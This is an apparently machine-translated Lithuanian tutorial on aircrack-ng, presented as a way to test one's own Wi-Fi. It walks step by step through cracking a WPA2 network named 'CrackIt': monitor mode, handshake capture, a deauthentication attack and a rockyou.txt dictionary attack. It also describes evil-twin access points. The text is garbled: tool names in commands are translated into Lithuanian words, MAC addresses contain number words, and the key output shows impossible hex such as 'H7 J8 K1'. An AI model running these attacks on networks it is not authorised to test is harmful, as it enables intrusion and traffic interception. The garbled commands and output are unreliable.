Kaip naudotis „Aircrack-ng“

How Use Aircrack Ng



Dažniausiai žmonės niekada negalvoja apie tinklą, prie kurio yra prisijungę. Jie niekada negalvoja, koks tas tinklas yra saugus ir kiek rizikuoja savo konfidencialiais duomenimis kasdien. Galite atlikti savo „Wi -Fi“ tinklų pažeidžiamumo patikrinimus naudodami labai galingą įrankį, vadinamą „Aircrack“ ir „Wireshark“. „Wireshark“ naudojama tinklo veiklai stebėti. „Aircrack“ yra daugiau kaip agresyvus įrankis, leidžiantis nulaužti ir suteikti prieigą prie belaidžių ryšių. Mąstymas kaip įsibrovėlis visada buvo saugiausias būdas apsisaugoti nuo įsilaužimo. Galbūt sužinosite apie tikslius veiksmus, kurių imsis įsibrovėlis, kad gautų prieigą prie jūsų sistemos, sužinoję apie „aircrack“. Tada galite atlikti atitikties patikrinimus savo sistemoje, kad įsitikintumėte, jog ji nėra nesaugi.

„Aircrack“ yra visas programinės įrangos rinkinys, skirtas „WiFi“ tinklo saugumui patikrinti. Tai ne tik vienas įrankis, bet ir priemonių rinkinys, kurių kiekviena atlieka tam tikrą tikslą. Galima dirbti su įvairiomis „Wi -Fi“ saugumo sritimis, pvz., Stebėti prieigos tašką, išbandyti, užpulti tinklą, nulaužti „Wi -Fi“ tinklą ir jį išbandyti. Pagrindinis „Aircrack“ tikslas yra perimti paketus ir iššifruoti maišas, kad būtų sulaužyti slaptažodžiai. Jis palaiko beveik visas naujas belaidžio ryšio sąsajas. „Aircrack“ yra patobulinta pasenusio įrankių rinkinio „Aircrack“ versija, ng nurodo Nauja karta . Kai kurie nuostabūs įrankiai, kurie veikia kartu atliekant didesnę užduotį.







„Airmon“:

„Airmon-ng“ yra įtrauktas į „aircrack-ng“ rinkinį, kuris įjungia tinklo sąsajos kortelę į monitoriaus režimą. Tinklo kortelės paprastai priima tik jiems skirtus paketus, kaip apibrėžta NIC MAC adresu, tačiau naudojant „airmon-ng“ taip pat bus priimami visi belaidžiai paketai, nesvarbu, ar jie skirti jiems, ar ne. Turėtumėte sugebėti sugauti šiuos paketus nesiejant ar neprisijungiant prie prieigos taško. Jis naudojamas prieigos taško būsenai patikrinti, įjungus tinklo sąsają į monitoriaus režimą. Pirmiausia reikia sukonfigūruoti belaidžio ryšio korteles, kad įjungtų monitoriaus režimą, tada nužudyti visus foninius procesus, jei manote, kad bet koks procesas tam trukdo. Baigus procesus, belaidžio ryšio sąsajoje galima įjungti monitoriaus režimą, vykdant toliau nurodytą komandą:



[apsaugotas el. paštas]: ~ $sudoairmon-ng start wlan0#

Taip pat galite išjungti monitoriaus režimą, bet kuriuo metu sustabdydami „airmon-ng“ naudodami toliau pateiktą komandą:

[apsaugotas el. paštas]: ~ $sudoairmon-ng stop wlan0#

Oro siurblys:

„Airodump-ng“ naudojamas išvardyti visus mus supančius tinklus ir peržiūrėti vertingą informaciją apie juos. Pagrindinė „airodump-ng“ funkcija yra uostyti paketus, todėl ji iš esmės yra užprogramuota suimti visus aplink mus esančius paketus, kai jie įjungiami monitoriaus režimu. Mes paleisime jį prieš visus mus supančius ryšius ir surinksime duomenis, pvz., Prie tinklo prijungtų klientų skaičių, atitinkamus „Mac“ adresus, šifravimo stilių ir kanalų pavadinimus, tada pradėsime taikyti pagal mūsų tikslinį tinklą.

Įvesdami komandą „airodump-ng“ ir kaip parametrą nurodydami tinklo sąsajos pavadinimą, galime suaktyvinti šį įrankį. Jame bus išvardyti visi prieigos taškai, duomenų paketų kiekis, naudojami šifravimo ir autentifikavimo metodai bei tinklo pavadinimas (ESSID). Įsilaužimo požiūriu „Mac“ adresai yra svarbiausi laukai.

[apsaugotas el. paštas]: ~ $sudo„airodump-ng wlx0mon“

Lėktuvas:

„Aircrack“ naudojamas slaptažodžiui nulaužti. Užfiksavę visus paketus naudodami „airodump“, mes galime nulaužti raktą pagal „aircrack“. Jis sulaužo šiuos raktus dviem būdais: PTW ir FMS. PTW metodas atliekamas dviem etapais. Iš pradžių naudojami tik ARP paketai, o tik tada, jei raktas po paieškos nesulaužtas, jis naudoja visus kitus užfiksuotus paketus. Plius PTW metodas yra tas, kad ne visi paketai naudojami įtrūkimams. Antruoju metodu, ty FMS, mes naudojame tiek statistinius modelius, tiek brutalios jėgos algos, norėdami įtrūkti raktą. Taip pat gali būti naudojamas žodyno metodas.

Eteris:

„Airplay-ng“ pristato paketus į belaidį tinklą, kad sukurtų ar pagreitintų srautą. „Aireplay-ng“ gali užfiksuoti paketus iš dviejų skirtingų šaltinių. Pirmasis yra tiesioginis tinklas, o antrasis - paketai iš jau egzistuojančio pcap failo. „Airplay-ng“ yra naudinga deautentifikavimo atakos metu, nukreipta į belaidį prieigos tašką ir vartotoją. Be to, kai kurias atakas, pavyzdžiui, kavos latte, galite atlikti naudodami „airplay-ng“-įrankį, leidžiantį gauti raktą iš kliento sistemos. Tai galite pasiekti sugavę ARP paketą, tada manipuliuodami juo ir siųsdami atgal į sistemą. Tada klientas sukurs paketą, kurį gali užfiksuoti „airodump“, ir „aircrack“ sulaužys šio modifikuoto paketo raktą. Kai kurios kitos „airplay-ng“ atakos parinktys yra „chopchop“, „fragment arepreplay“ ir kt.

Oro bazė:

„Airbase-ng“ naudojama įsibrovėlio kompiuteriui paversti į pažeistą prisijungimo tašką, kad kiti galėtų susieti. Naudodamiesi „Airbase-ng“, galite teigti, kad esate teisėtas prieigos taškas, ir atakuoti viduryje kompiuterius, prijungtus prie jūsų tinklo. Tokios atakos vadinamos blogosiomis atakomis. Pagrindiniams vartotojams neįmanoma atskirti teisėto prieigos taško ir suklastoto prieigos taško. Taigi, blogio dvynių grėsmė yra viena iš grėsmingiausių belaidžių grėsmių, su kuriomis šiandien susiduriame.

„Airolib-ng“:

„Airolib“ pagreitina įsilaužimo procesą, saugodamas ir tvarkydamas slaptažodžių sąrašus ir prieigos tašką. Šios programos naudojama duomenų bazių valdymo sistema yra „SQLite3“, kuri dažniausiai prieinama visose platformose. Slaptažodžio nulaužimas apima porinio pagrindinio rakto, per kurį išgaunamas privatus pereinamasis raktas (PTK), apskaičiavimą. Naudodami PTK, galite nustatyti tam tikro paketo rėmelio pranešimo identifikavimo kodą (MIC) ir teoriškai nustatyti, kad MIC yra panašus į paketą, taigi, jei PTK buvo teisus, PMK taip pat buvo teisus.

Norėdami pamatyti duomenų bazėje saugomus slaptažodžių sąrašus ir prieigos tinklus, įveskite šią komandą:

[apsaugotas el. paštas]: ~ $sudo„airolib-ng“ bandymų duomenų bazės statistika

Čia testų duomenų bazė yra db, kurį norite pasiekti arba sukurti, o –stats yra operacija, kurią norite atlikti su ja. Duomenų bazės laukuose galite atlikti kelias operacijas, pavyzdžiui, suteikti maksimalų prioritetą tam tikram SSID ar pan. Jei norite naudoti „airolib-ng“ su „aircrack-ng“, įveskite šią komandą:

[apsaugotas el. paštas]: ~ $sudolėktuvas-ng-rtestdatabase wpa2.eapol.cap

Čia mes naudojame jau apskaičiuotus PMK, saugomus bandymų duomenų bazė kaip pagreitinti slaptažodžio nulaužimo procesą.

WPA/WPA2 įtrūkimai naudojant „Aircrack-ng“:

Pažvelkime į nedidelį pavyzdį, ką „aircrack-ng“ gali padaryti naudodamas keletą nuostabių įrankių. Naudodami žodyno metodą sulaužysime iš anksto bendrinamą WPA/WPA2 tinklo raktą.

Pirmas dalykas, kurį turime padaryti, yra išvardyti tinklo sąsajas, palaikančias monitoriaus režimą. Tai galima padaryti naudojant šią komandą:

[apsaugotas el. paštas]: ~ $sudoairmon-ng

PHY sąsajos tvarkyklės mikroschemų rinkinys

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Mes matome sąsają; Dabar mes turime nustatyti tinklo sąsają, kurią radome (wlx0) monitoriaus režimu, naudodami šią komandą:

[apsaugotas el. paštas]: ~ $sudoairmon-ng start wlx0

Jis įgalino monitoriaus režimą sąsajoje, vadinamoje wlx0mon .

Dabar turėtume pradėti klausytis netoliese esančių maršrutizatorių transliacijų per mūsų tinklo sąsają, kurią įjungėme monitoriaus režimu.

[apsaugotas el. paštas]: ~ $sudo„airodump-ng wlx0mon“

CH5 ][Praėjo:30s][ 2020 m-12-02 00:17



BSSID PWR švyturiai#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Keturi, penki 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: BŪK-63 77 0 0 654e. „WPA2 CCMP PSK Hackme“

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DUODA:88: FA:38: 02-68 28 2 0 vienuolika54e WPA2 CCMP PSK TP-Link_3802



„BSSID STATION PWR“ prarastų kadrų zondas



E4: 6F:13: 04: CE:315C: 3A:Keturi, penki: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31Kr.91: B5: F8: 7E: D5 -390e-1 1002 13

Mūsų tikslinis tinklas yra Crackit šiuo atveju, kuris šiuo metu veikia 1 kanale.

Čia, norėdami nulaužti tikslinio tinklo slaptažodį, turime užfiksuoti 4 krypčių rankos paspaudimą, kuris atsitinka, kai įrenginys bando prisijungti prie tinklo. Mes galime jį užfiksuoti naudodami šią komandą:

[apsaugotas el. paštas]: ~ $sudooro siurblys-c 1--bssid E4: 6F:13: 04: CE:31 /namų wlx0

-c : Kanalas

- Bss : Tikslinio tinklo Bssid

: Katalogo, kuriame bus patalpintas pcap failas, pavadinimas

Dabar turime palaukti, kol įrenginys prisijungs prie tinklo, tačiau yra geresnis būdas užfiksuoti rankos paspaudimą. Naudodami šią komandą galime panaikinti įrenginių autentifikavimą prieigos taške, naudodami deautentifikavimo ataką:

[apsaugotas el. paštas]: ~ $sudooro eteris-0 E4: 6F:13: 04: CE:31

į : Tikslinio tinklo Bssid

-0 : autentifikavimo ataka

Mes atjungėme visus įrenginius ir dabar turime palaukti, kol įrenginys prisijungs prie tinklo.

CH1 ][Praėjo:30s][ 2020 m-12-02 00:02][WPA rankos paspaudimas: E4: 6F:13: 04: CE:31



BSSID PWR RXQ švyturiai#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154 -asis WPA2 CCMP PSK P.



„BSSID STATION PWR“ prarastų kadrų zondas



E4: 6F:13: 04: CE:31Kr.91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Keturi, penki: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e-6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Gavome smūgį, o žiūrėdami į viršutinį dešinįjį kampą šalia laiko matome, kad buvo užfiksuotas rankos paspaudimas. Dabar pažiūrėkite į nurodytą aplanką ( /namai mūsų atveju) už a .pcap failą.

Norėdami nulaužti WPA raktą, galime naudoti šią komandą:

[apsaugotas el. paštas]: ~ $sudolėktuvas-ng-2 rockyou.txt-bE4: 6F:13: 04: CE:31rankos paspaudimas.kap

b: tikslinio tinklo Bssid

-a2: WPA2 režimas

Rockyou.txt: žodynasfailąnaudojamas

Rankos paspaudimas: dangtelisfailą kurisyra užfiksuotas rankos paspaudimas

„Aircrack“1.2beta3

[00:01:49] 10566išbandyti raktai(1017.96į/s)

RAKTAS! [pričiupai mane]

Pagrindinis raktas: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpenkiasdešimtC


Laikinas raktas: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpenkiasdešimtC025 62E9 5D71

Mūsų tikslinio tinklo raktas sėkmingai nulaužtas.

Išvada:

Belaidžiai tinklai yra visur, jais naudojasi kiekviena įmonė - nuo darbuotojų, naudojančių išmaniuosius telefonus iki pramoninių valdymo įrenginių. Remiantis tyrimais, 2021 m. Beveik daugiau nei 50 procentų interneto srauto bus per WiFi bet kuriam kitam vartotojui ir gali lengvai prijungti jūsų mobiliuosius įrenginius prie namų biurų, kol jūsų nėra.

Nepaisant šių pranašumų, yra didelis klaustukas apie jūsų privatumą ir saugumą. Kaip šie tinklai; perdavimo diapazone esantys maršrutizatoriai yra atviri visiems, jie gali būti lengvai užpulti ir jūsų duomenys gali būti lengvai pažeisti. Pvz., Jei esate prisijungę prie tam tikro viešojo „Wi -Fi“, visi prie to tinklo prisijungę asmenys gali lengvai patikrinti jūsų tinklo srautą, naudodamiesi tam tikra žvalgybos informacija ir naudodamiesi nuostabiais prieinamais įrankiais, ir netgi jį išmesti.